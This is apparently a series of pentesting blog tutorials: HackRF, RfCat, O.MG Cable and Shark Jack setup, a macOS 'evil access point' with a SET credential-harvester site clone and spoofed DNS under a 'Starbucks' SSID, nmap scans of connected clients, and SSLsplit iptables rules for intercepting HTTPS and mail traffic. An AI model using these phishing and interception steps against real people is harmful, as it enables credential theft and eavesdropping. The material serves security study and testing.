This time it’s about installing HackRF One binaries on the macOS Big Sur. In another later tutorial I will dive deeper into macOS, HackRF ONE and GnuRadio (gnuradio-companion), but not yet. The installation takes place via latest MacPorts.
My first installation failed with a error (even as MacPorts where completely new installed and Command Line Tools where installed, too). I looked into log file and saw a issue with clang version.
# read log file (optional)
$ cat /opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_macports_release_tarballs_ports_science_hackrf/hackrf/main.log
…
clang: error: invalid version number in 'MACOSX_DEPLOYMENT_TARGET=11.0'
…
# show clang version (optional)
$ clang --version
So looked it up on the Internet and saw that the clang version in the new SDK is higher and will solve this issue. To confirm I had a look installed SDK’s.
# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk
To be really sure. Yes new SDK is installed.
# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk MacOSX11.1.sdk
# show xcrun configs (optional)
$ xcrun --sdk macosx11.1 --show-sdk-path
$ xcrun --sdk macosx11.1 --show-sdk-version
Installation
After the installation and verification (yes the new sdk was getting installed), I tried the macPorts installation again.
# install hackrf via mac ports
$ sudo port install hackrf
Test installation
This time all went fine and I could start testing the device.
# show USB device info (optional)
$ ioreg -p IOUSB -l -w 0 -b
# show hackrf info
$ hackrf_info
# start debug (optional)
$ hackrf_debug --si5351c -n 0 -r
# start record
$ hackrf_transfer -r myRecord.raw -f 433780000
# start transmit record
$ hackrf_transfer -t myRecord.raw -f 433780000 -x 20
I finally received my Yard Stick One (Yet Another Radio Dongle) and can get started with it. It is available from Hak5 (incl. ANT500 antenna) and various other resellers. In this tutorial I would like to show you, how to install RfCat on Kali Linux (version 2020.4) and point out the necessary steps, so that you can start pentesting immediately with this awesome device.
Install needed packages
The installation is actually very simple. Python3 is not a problem, even if many sources claim different. The following steps show the installation of the necessary packages (before RfCat can be installed and used). You may have already installed some of them on your system (depends on Kali Metapackages installed).
On my system following packages are installed already: curl, git, make, libusb-1.0-0, python3-numpy, python3-serial, python3-future and ipython3.
Also for RfCat we don’t use the Kali apt repository but clone the GitHub repository from https://github.com/atlas0fd00m/rfcat (and install it from there).
Note: Because of security settings (of my provider), I need to show the next command as picture.
# refresh rules
$ sudo udevadm control --reload-rules
Test the installation
That was actually super easy and also happened very quickly. A little test (show help) and then you can start using Yard Stick One.
# change back to home directory
$ cd ~
# show rfcat help (optional)
$ rfcat -h
If you do not get help or an error message, please verify that all dependencies are installed or that you did not mix up different Python versions.
You may need to install the following packages: python3-pyside2.qtcore, python3-pyside2.qtgui and python3-pyside2.qtwidgets.
Run RfCat
I do run Kali Linux as VirtualBox (6.1) VM, so it’s time to plugin and passthrough the USB device.
Note: I don’t like Passwordless Sudo, but you’re welcome to customize it, to suit your needs.
# verify USB device (optional)
$ lsusb
...
Bus 002 Device 003: ID 1d50:605b OpenMoko, Inc. RfCat YARD Stick One
...
# start rfcat (interactive + d.* objects)
$ sudo rfcat -r
The following commands should help you to get familiar with the Yard Stick One device, as I want just to show the setup in this tutorial and will end here with these examples.
# show help (optional)
In [1]: help(d.setRFRegister)
# show current settings (optional)
In [2]: print(d.reprRadioConfig())
# start listen (ENTER stops)
In [3]: d.RFlisten()
# reset after scan/transmit (important)
In [4]: d.setModeIDLE()
# exit rfcat
In [5]: exit
Many times I’v got asked (directly, via messages or forums) why the macOS internet connection does not work anymore, while using devices like Shark Jack, O.MG Cable and so on. In my tutorials I also did not mention this in detail, because I assumed this should be clear. A big mistake from my side. Therefore now this article. I will now do my best to explain, using a few examples, how to prioritize the services so that you do not lose your internet connection from your macOS. I will use the internet connection via Wifi hotspot.
Note: I show here an specific example for Shark Jack now. But main target is that you understand and can reuse your knowledge also for different other situations.
Network locations
The first part is about macOS network locations. To not destroy your current settings, we will create a new network location (all via command line).
Warning: The following steps will disconnect your internet connection (briefly), because the new created network location is not populated. Read the tutorial carefully before you execute any command!
# list all network locations
$ networksetup -listlocations
# show name of the current location
$ networksetup -getcurrentlocation
# create new location (SharkJackNetwork)
$ networksetup -createlocation SharkJackNetwork
# change location
$ networksetup -switchtolocation SharkJackNetwork
# lists network interfaces (should be empty)
$ networksetup -listallnetworkservices
Services
The newly created network location does not contain any service now. In the next second part we create two (Wifi and Bluetooth), set own DNS server and test. If you have stored your Wifi credentials (see Keychain Access.app), the internet connection will automatically established again.
# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports
# create WI-FI service (named WLAN)
$ networksetup -createnetworkservice WLAN "WI-FI"
# create Bluetooth PAN service (named Bluetooth)
$ networksetup -createnetworkservice Bluetooth "Bluetooth PAN"
# lists network interfaces (WLAN and Bluetooth)
$ networksetup -listallnetworkservices
# add dns server (to WLAN)
$ networksetup -setdnsservers WLAN 8.8.8.8 8.8.4.4
# verify DNS settings (optional)
$ dig +all example.com
My MacBook Pro does not provide an RJ45 interface (only USB-C). Therefore I buyed a Multi-Port-Adapter from Satechi. After plug in, I add this device now to my services. There are many other vendors as well, for such please choose your own name.
# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports
# create adapter service (named Satechi)
$ networksetup -createnetworkservice Satechi "USB 10/100/1000 LAN"
Now it’s time to use Shark Jack. Turn it on (arming mode), plug into adapter, wait for IP and test. If you haven’t changed it, the default IP is “172.16..24.1”, the user is “root” and password is “hak5shark”.
# wait for IP
$ ifconfig en8
# run command over SSH
$ ssh -C4 root@172.16.24.1 -C 'pwd'
# ping google dns
$ ping -c 1 google.com
The internet connection is not working anymore but Wifi seems working correctly!
Service order
Now it comes to the order of all services (prioritization). Here we ensure that internet connection works again.
# show services in the order they are contacted for a connection
$ networksetup -listnetworkserviceorder
# command to designate the order network services are contacted
$ networksetup -ordernetworkservices WLAN Satechi Bluetooth
# ping google dns
$ ping -c 1 google.com
All good now … The newly created network location (incl. services) can be used as soon you develop your Shark Jack payloads. Specific to your environment needs, you can create and use many of these network locations (to quickly switch between).
MG made something really cool (and dangerous too) to perform keystroke injection attacks (via Rubber Ducky scripts) simply over wireless interface. In this tutorial I want to show you the first important steps before you can start the penetration testing. The cables, programmer and other awesome MG products are available from Hak5.
Important: You should own (or buy) at least one O.MG Cable Programmer, otherwise you will not be able to follow the steps below!
Preparation
First check whether Python 3.7 (or higher) and pyserial (incl. dependencies) is installed. It is already pre-installed in my Kali Linux.
Download the latest O.MG Firmware (incl. needed scripts/binaries) now.
# download latest Firmware via CURL
$ curl -L -C - https://github.com/O-MG/O.MG_Cable-Firmware/releases/download/v1.5.3/O.MG_Cable-Firmware-v1.5.3.zip -o ~/Downloads/O.MG_Cable-Firmware-v1.5.3.zip
# unzip archive
$ unzip ~/Downloads/O.MG_Cable-Firmware-v1.5.3.zip -d ~/Downloads/
# list content (optional)
$ ls -la ~/Downloads/O.MG_Cable-Firmware-v1.5.3/
# list physical USB device hierarchy (optional)
$ lsusb
Install Firmware
Now plug the O.MG programmer into your computer and the O.MG cable into the programmer. This can be a bit more difficult at first, so be careful not to destroy everything right away. Even when pulling out – Treat it like a beautiful woman.
Note: If you are running Kali Linux as VM (e.g. VirtualBox), passthrough needed USB devices.
Change into directory O.MG_Cable-Firmware-v1.5.3 and set the file permissions for file flash.py and start the Firmware configuration and setup.
# list physical USB device hierarchy (optional)
$ lsusb
# run python script
$ sudo python3 ./flash.py
Caution: If you see the following output (or similar) Connecting........_____..... but flashing the firmware ends with an error – means that the programmer was recognized correctly but the cable was not. Remove the cable and plug it in again. In addition, the cable needs a reset after every firmware flash.
If everything works (which is the normal case) you will be asked in which mode (AP or STA) the wifi should work. In my example, I am using for this tutorial the Access Point (AP) mode. So I’ll set the SSID as well as wifi credentials. You can later access with any modern browser via URL http://192.168.4.1. Whether you need AP or STA mode depends on your environment and your attack vector. But try to get to know both as well as their respective advantages and disadvantages.
SELECT WIFI MODE ...: 2
ENTER WIFI SSID ...: OMGtest
ENTER WIFI PASS ...: test12345
Confirm your entries and wait a moment. An overview is displayed (do not forget the password).
Flash Operation Complete!
[ WIFI SETTINGS ]
WIFI_SSID: OMGtest
WIFI_PASS: test12345
WIFI_MODE: 2
WIFI_TYPE: ACCESS POINT
[ FIRMWARE USED ]
INIT: firmware/esp_init_data_default_v08.bin
ELF0: firmware/image.elf-0x00000.bin
ELF1: firmware/image.elf-0x10000.bin
PAGE: firmware/page.mpfs
<<< PROCESS FINISHED, REMOVE PROGRAMMER >>>
Press Enter to continue...
That was done super quickly and easily. Now pull the cable out of the programmer and you can start.
After you receive your new Shark Jack device from Hak5, you need to upgrade the Firmware. This tiny tutorial will guide you through the process. You should plan a maximum of 10 minutes of your life for this action.
Preparation
Enable the Arming mode (middle switch position) and connect with your RJ45 interface, also connect USB-C for charging. Do not stop charging while the whole upgrade process! In case your local device does not provide such interface, I have really good experience with the multiport adapter from SATECHI.
# download Firmware (via command line)
$ curl -L -C - https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0-stable -o ~/Downloads/upgrade-1.1.0.bin
# verify SHA256 checksum (optional)
$ shasum -a 256 ~/Downloads/upgrade-1.1.0.bin
# copy Firmware from local to Shark Jack device
$ scp -C4 ~/Downloads/upgrade-1.1.0.bin root@172.16.24.1:/tmp/
# SSH into SharkJack device
$ ssh -C4 root@172.16.24.1
# list directory content (optional)
root@shark:~# ls -la
# show current version
root@shark:~# cat VERSION
1.0
# start update
root@shark:~# sysupgrade -n /tmp/upgrade-1.1.0.bin
Now be patient and do not remove the Shark Jack from RJ45 or the USB-C for charging! The device installs the new firmware and reboots. For me it was around 3 – 4 minutes.
# check interface status (optional)
$ ifconfig
# SSH into Shark Jack device
$ ssh -C4 root@172.16.24.1
# show current version
root@shark:~# cat VERSION
1.1.0
With just a few steps it is possible to convert the MacBook into an evil access point. The device already has everything that is necessary in terms of hardware. For the additionally software only an Internet access is is required.
Note: The installation and configuration of Kali Linux VM (inside VirtualBox) is not part of this tutorial.
Objectives
Turn the macOS into wifi hotspot with fake DNS.
Starting position
Via cable (USB-C to Lightning) my MacBook and my IPhone are connected. On the IPhone the Hotspot (USB tethering) is enabled. The Wifi devices is off. Finally there is a Kali Linux VM and SSH access is configured in it.
Step 1: check current local config
Most of the following commands in the first step are optional, only your own IP is important. But this will give you a better understanding of your system.
# show local ip
$ ifconfig en7
[172.20.10.2]
# show system DNS configuration (optional)
$ scutil --dns | grep nameserver
# show network status (optional)
$ netstat -na | grep "\.53"
My interface is en7 and my local IP is 172.20.10.2. For you this can be different! The IPhone is my nameserver 172.20.10.1 (results of scutil) and no service is listen on port 53 (results of netstat).
Step 2: start Kali Linux and clone website
As already mentioned, we are now using the Kali Linux VM. The only important point for VM configuration is that the interface is mode “Bridged Network“.
# list all vm's
$ VBoxManage list vms
# start headless specific vm
$ VBoxManage startvm --type headless "KaliLinux"
# show running vm's (optional)
$ VBoxManage list runningvms
# get IP of vm
$ VBoxManage guestproperty get "KaliLinux" "/VirtualBox/GuestInfo/Net/0/V4/IP"
[172.20.10.3]
# SSH into VM
$ ssh <user>@172.20.10.3
# start setoolkit
$ sudo setoolkit
# select Social-Engineering Attacks
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
set> 1
# select Website Attack Vectors
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
set> 2
# select Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set:webattack> 3
# select Site Cloner
1) Web Templates
2) Site Cloner
3) Custom Import
set:webattack> 2
After the inputs for IP (IP of VM) and domain (URL to clone) you should use an other tab (CMD + t) on your terminal. You can check the cloning result in your browser.
Step 3: clone, build, and run dnsmasq
Now dnsmasq is needed. You can install via brew or download and compile by your self.
# clone latest git repository
$ git clone git://thekelleys.org.uk/dnsmasq.git
# change into cloned directory
$ cd dnsmasq
# build dnsmasq binary
$ make
# show help for dnsmasq
$ sudo ./src/dnsmasq --help
# run dnsmasq
$ sudo ./src/dnsmasq --no-dhcp-interface= --no-daemon --log-queries --no-hosts --no-resolv --no-poll --server=8.8.8.8 --address="/example.com/172.20.10.3"
Dnsmasq runs without DHCP service, without reading /etc/hosts and /etc/resolv.conf. Google IP is given for upstream DNS server.
Step 4: test your DNS
And again you should use an other tab (CMD + t) on your terminal. Now you can verify the dnsmasq configuration.
# flush local DNS
$ sudo killall -HUP mDNSResponder
# dig on local IP
$ dig @172.20.10.2 +short example.com
# dig on localhost
$ dig @localhost +all example.com
# nslookup on local
$ nslookup login.example.com 172.20.10.2
Step 5: create access point
Set the DNS server for the Wi-Fi service and then start the hotspot.
# set DNS server
$ networksetup -setdnsservers Wi-Fi 172.20.10.2
My favorite SSID: Starbucks
Now it’s time to wait… In the meantime, you can find out more about your connected STA’s.
# show STA informations (optional)
$ cat /private/var/db/dhcpd_leases
Some STA’s (stations) are connected to your AP (access point) and you need now more informations about them? No Problem! In this tiny tutorial I will show some command line possibilities. Together we will look who is connected, will try to detect the OS (incl. ports and services). Important is that for this examples your need to share internet connect to Wifi Pineapple, otherwise downloads/installations will not work.
Objectives
With different command line technics we actively gather information from connected STA’s.
Step 1: install nmap
As usual, the installation via opkg is very simple. Update list of available packages, search for package, read about dependencies and start the installation.
# update list of available packages
$ opkg update
# search for package
$ opkg list nmap
# get some informations
$ opkg info nmap
# check if dependencies are already installed
$ opkg status libpcap1
# install all needed packages
$ opkg install libpcap1 nmap
# verify installation
$ nmap --help
Step 2: get connected clients via command line
With following nmap commands you could start to detect STA’s, but to be honest this is slow and not really the optimal solution. But I will show them.
If you tried out, you feel already that this cannot the best way. With iw or iwinfo commands we found them much faster. To get fast the IP you could grep inside the file /tmp/dhcp.leases.
# show STA's via iw
$ iw dev wlan0 station dump
# show STA's via iwinfo
$ iwinfo wlan0 assoclist
# get specific IP via dhcp.leases
$ cat /tmp/dhcp.leases | grep -i '70:48:0F:C3:31:7A' | cut -d ' ' -f3
Step 3: run nmap against specific client
Now the nmap scans will be used only for specific STA’s. Here are a few scan command examples.
# classical ping
$ nmap -PE 172.16.42.x
# scanning the entire port range
$ nmap -v -p- 172.16.42.x
# detect services
$ nmap -v -sV 172.16.42.x
# detect OS
$ nmap -v -O 172.16.42.x
# detect services and OS
$ nmap -v -O -sV 172.16.42.x
# aggressive scan (includes -O, -sV, -sC and --traceroute)
$ nmap -v -A 172.16.42.x
You need to find the best parameters for yourself but the output in combinations with tools like searchsploit (GitHub) it can be very powerful.
Many people complain about that they are not able to run SSLsplit on Wifi Pineapple. As you may know from my previous Pineapple tutorials, I will try to explain the solution now, without the usage of any additional module. All needed steps for installation, configuration and execution need the enabled internet sharing!
Objectives
In this example you will learn how to setup and run SSLsplit on Wifi Pineapple.
Step 1: install needed packages
SSH into Wifi Pineapple device and install all needed software with Opkg Package Manager.
Like the module would create directories and configuration files, we do exactly the same. So we could install the module later, too.
# create need folders
$ mkdir -p /pineapple/modules/SSLsplit/cert
$ mkdir -p /pineapple/modules/SSLsplit/rules
$ mkdir -p /pineapple/modules/SSLsplit/log
# create iptables and openssl.cnf files
$ vi /pineapple/modules/SSLsplit/rules/iptables
$ vi /pineapple/modules/SSLsplit/cert/openssl.cnf
# create sslsplit configuration
$ touch /etc/config/sslsplit
# add content
$ echo "config sslsplit 'module'" > /etc/config/sslsplit
# check if ip4 forward is enabled
$ cat /proc/sys/net/ipv4/ip_forward
# enable ip4 forward (if not enabled)
$ echo '1' > /proc/sys/net/ipv4/ip_forward
# show help (optional)
$ sslsplit -h
The content of iptables
##################################################################
# Certain packets are redirected to the local port 8080 and 8443 #
##################################################################
## Plain text HTTP traffic (80) is redirected to port 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
## WhatsApp (5222) is redirected to port 8080
iptables -t nat -A PREROUTING -p tcp --dport 5222 -j REDIRECT --to-ports 8080
## SSL-based HTTPS traffic (443) is redirected to port 8443
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
## IMAP over SSL (993), SMTP over SSL (465 and 587) is redirected to port 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
